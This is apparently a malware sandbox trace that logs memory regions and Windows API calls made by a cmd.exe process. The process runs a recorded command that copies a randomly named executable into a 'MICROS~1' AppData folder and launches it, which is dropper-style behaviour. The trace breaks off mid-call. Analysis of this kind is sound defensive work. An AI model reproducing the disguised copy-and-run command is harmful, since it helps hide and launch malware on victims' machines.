"BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 856 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 857 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 858 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 859 start_va 
= 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 860 start_va = 0x4a0f0000 end_va = 0x4a13bfff entry_point = 0x4a0f0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 861 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 862 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 863 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 864 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 865 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1050 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1051 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1052 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1053 start_va = 0x290000 end_va = 0x2f6fff entry_point = 0x290000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1054 start_va = 0x4b0000 end_va = 0x4bffff entry_point = 
0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1055 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1056 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1057 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1058 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1059 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1060 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1061 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1062 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1063 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1064 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 1065 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1066 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1067 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1068 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1069 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1070 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 1071 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 1072 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 1073 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Region: id = 1171 start_va = 0x1340000 end_va = 0x160efff entry_point = 0x1340000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") 
Region: id = 1293 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "lsfkrhur.exe" filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\micros~1\\lsfkrhur.exe") Thread: id = 13 os_tid = 0xb38 [0096.220] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f8bc | out: lpSystemTimeAsFileTime=0x18f8bc*(dwLowDateTime=0x779e9800, dwHighDateTime=0x1d440a9)) [0096.220] GetCurrentProcessId () returned 0xb34 [0096.220] GetCurrentThreadId () returned 0xb38 [0096.220] GetTickCount () returned 0x2312d [0096.220] QueryPerformanceCounter (in: lpPerformanceCount=0x18f8b4 | out: lpPerformanceCount=0x18f8b4*=15300914678) returned 1 [0096.220] GetModuleHandleA (lpModuleName=0x0) returned 0x4a0f0000 [0096.220] __set_app_type (_Type=0x1) [0096.220] __p__fmode () returned 0x76b331f4 [0096.221] __p__commode () returned 0x76b331fc [0096.221] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1121a6) returned 0x0 [0096.221] __getmainargs (in: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c, _DoWildCard=0, _StartInfo=0x4a114140 | out: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c) returned 0 [0096.221] GetCurrentThreadId () returned 0xb38 [0096.221] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb38) returned 0x38 [0096.221] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0096.221] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0096.221] SetThreadUILanguage (LangId=0x0) returned 0x409 [0096.221] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0096.221] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f84c | out: phkResult=0x18f84c*=0x0) returned 0x2 [0096.221] VirtualQuery (in: lpAddress=0x18f883, 
lpBuffer=0x18f81c, dwLength=0x1c | out: lpBuffer=0x18f81c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0096.221] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f81c, dwLength=0x1c | out: lpBuffer=0x18f81c*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0096.221] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f81c, dwLength=0x1c | out: lpBuffer=0x18f81c*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0096.221] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f81c, dwLength=0x1c | out: lpBuffer=0x18f81c*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0096.221] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f81c, dwLength=0x1c | out: lpBuffer=0x18f81c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x11000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0096.221] GetConsoleOutputCP () returned 0x1b5 [0096.221] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0096.222] SetConsoleCtrlHandler (HandlerRoutine=0x4a10e72a, Add=1) returned 1 [0096.222] _get_osfhandle (_FileHandle=1) returned 0x7 [0096.222] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0096.222] _get_osfhandle (_FileHandle=1) returned 0x7 [0096.222] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0096.222] _get_osfhandle (_FileHandle=1) returned 0x7 [0096.222] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0096.222] _get_osfhandle (_FileHandle=0) returned 0x3 [0096.222] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) 
returned 1 [0096.222] _get_osfhandle (_FileHandle=0) returned 0x3 [0096.222] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0096.222] GetEnvironmentStringsW () returned 0x1a0400* [0096.223] FreeEnvironmentStringsW (penv=0x1a0400) returned 1 [0096.223] GetEnvironmentStringsW () returned 0x1a0400* [0096.223] FreeEnvironmentStringsW (penv=0x1a0400) returned 1 [0096.223] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e7bc | out: phkResult=0x18e7bc*=0x40) returned 0x0 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x0, lpData=0x18e7c8*=0xb0, lpcbData=0x18e7c0*=0x1000) returned 0x2 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x4, lpData=0x18e7c8*=0x1, lpcbData=0x18e7c0*=0x4) returned 0x0 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x0, lpData=0x18e7c8*=0x1, lpcbData=0x18e7c0*=0x1000) returned 0x2 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x4, lpData=0x18e7c8*=0x0, lpcbData=0x18e7c0*=0x4) returned 0x0 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x4, lpData=0x18e7c8*=0x40, lpcbData=0x18e7c0*=0x4) returned 0x0 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x4, lpData=0x18e7c8*=0x40, 
lpcbData=0x18e7c0*=0x4) returned 0x0 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x0, lpData=0x18e7c8*=0x40, lpcbData=0x18e7c0*=0x1000) returned 0x2 [0096.223] RegCloseKey (hKey=0x40) returned 0x0 [0096.223] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e7bc | out: phkResult=0x18e7bc*=0x40) returned 0x0 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x0, lpData=0x18e7c8*=0x40, lpcbData=0x18e7c0*=0x1000) returned 0x2 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x4, lpData=0x18e7c8*=0x1, lpcbData=0x18e7c0*=0x4) returned 0x0 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x0, lpData=0x18e7c8*=0x1, lpcbData=0x18e7c0*=0x1000) returned 0x2 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x4, lpData=0x18e7c8*=0x0, lpcbData=0x18e7c0*=0x4) returned 0x0 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x4, lpData=0x18e7c8*=0x9, lpcbData=0x18e7c0*=0x4) returned 0x0 [0096.223] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x4, lpData=0x18e7c8*=0x9, lpcbData=0x18e7c0*=0x4) returned 0x0 [0096.223] RegQueryValueExW (in: 
hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e7c4, lpData=0x18e7c8, lpcbData=0x18e7c0*=0x1000 | out: lpType=0x18e7c4*=0x0, lpData=0x18e7c8*=0x9, lpcbData=0x18e7c0*=0x1000) returned 0x2 [0096.223] RegCloseKey (hKey=0x40) returned 0x0 [0096.223] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88634a [0096.223] srand (_Seed=0x5b88634a) [0096.223] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0096.223] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1" [0096.224] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0096.224] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1a1b60, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0096.224] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0096.224] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0096.224] GetEnvironmentVariableW (in: lpName="PROMPT", 
lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0096.224] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0096.224] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0096.224] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0096.224] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0096.224] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0096.224] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0096.224] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0096.224] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0096.224] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0096.224] GetEnvironmentStringsW () returned 0x1a2550* [0096.225] FreeEnvironmentStringsW (penv=0x1a2550) returned 1 [0096.225] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0096.225] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0096.225] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0096.225] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0096.225] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0096.225] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0096.225] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0096.225] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0096.225] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0096.225] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0096.225] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f588 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0096.225] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f588, lpFilePart=0x18f584 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f584*="Desktop") returned 0x18 [0096.225] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0096.225] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f304 | out: lpFindFileData=0x18f304) returned 0x1a0be0 [0096.225] FindClose (in: hFindFile=0x1a0be0 | out: hFindFile=0x1a0be0) returned 1 [0096.225] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f304 | out: lpFindFileData=0x18f304) returned 0x1a0be0 [0096.225] FindClose (in: hFindFile=0x1a0be0 | out: hFindFile=0x1a0be0) returned 1 [0096.225] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f304 | out: lpFindFileData=0x18f304) returned 0x1a0be0 [0096.225] FindClose (in: hFindFile=0x1a0be0 | out: hFindFile=0x1a0be0) returned 1 [0096.226] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0096.226] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0096.226] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0096.226] GetEnvironmentStringsW () returned 0x1a0400* [0096.226] FreeEnvironmentStringsW (penv=0x1a0400) returned 1 [0096.226] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0096.226] GetConsoleOutputCP () returned 0x1b5 [0096.226] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0096.226] GetUserDefaultLCID () returned 0x409 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a114950, cchData=8 | out: lpLCData=":") returned 2 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f6c8, cchData=128 | out: lpLCData="0") returned 2 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, 
lpLCData=0x18f6c8, cchData=128 | out: lpLCData="0") returned 2 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f6c8, cchData=128 | out: lpLCData="1") returned 2 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a114940, cchData=8 | out: lpLCData="/") returned 2 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a114d80, cchData=32 | out: lpLCData="Mon") returned 4 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a114d40, cchData=32 | out: lpLCData="Tue") returned 4 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a114d00, cchData=32 | out: lpLCData="Wed") returned 4 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a114cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a114c80, cchData=32 | out: lpLCData="Fri") returned 4 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a114c40, cchData=32 | out: lpLCData="Sat") returned 4 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a114c00, cchData=32 | out: lpLCData="Sun") returned 4 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a114930, cchData=8 | out: lpLCData=".") returned 2 [0096.227] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a114920, cchData=8 | out: lpLCData=",") returned 2 [0096.227] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0096.228] GetConsoleTitleW (in: lpConsoleTitle=0x190a60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0096.228] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0096.228] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0096.228] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0096.228] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") 
returned 0x76962732 [0096.229] _wcsicmp (_String1="type", _String2=")") returned 75 [0096.229] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0096.229] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0096.229] _wcsicmp (_String1="IF", _String2="type") returned -11 [0096.229] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0096.229] _wcsicmp (_String1="REM", _String2="type") returned -2 [0096.229] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0096.233] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\"") returned 68 [0096.233] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\"") returned 68 [0096.233] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\"") returned 71 [0096.233] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\"") returned 71 [0096.233] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\"") returned 80 [0096.233] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\"") returned 80 [0096.235] _get_osfhandle (_FileHandle=1) returned 0x7 [0096.235] _get_osfhandle (_FileHandle=1) returned 0x7 [0096.235] _get_osfhandle (_FileHandle=1) returned 0x7 [0096.235] GetFileType (hFile=0x7) returned 0x2 [0096.235] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0096.235] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f55c | out: lpMode=0x18f55c) returned 1 [0096.236] _dup (_FileHandle=1) returned 3 [0096.236] _close (_FileHandle=1) returned 0 [0096.236] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe", _String2="con") returned -53 [0096.236] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe" (normalized: 
"c:\\users\\eebsym5\\appdata\\roaming\\micros~1\\lsfkrhur.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x18f52c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0096.237] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0096.237] GetConsoleTitleW (in: lpConsoleTitle=0x18f35c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0096.237] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0096.237] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0096.237] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0096.237] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0096.238] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0096.238] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x18eec0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eec0) returned 0x1a20b8 [0096.238] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0096.238] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0096.239] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0096.239] CreateFileW 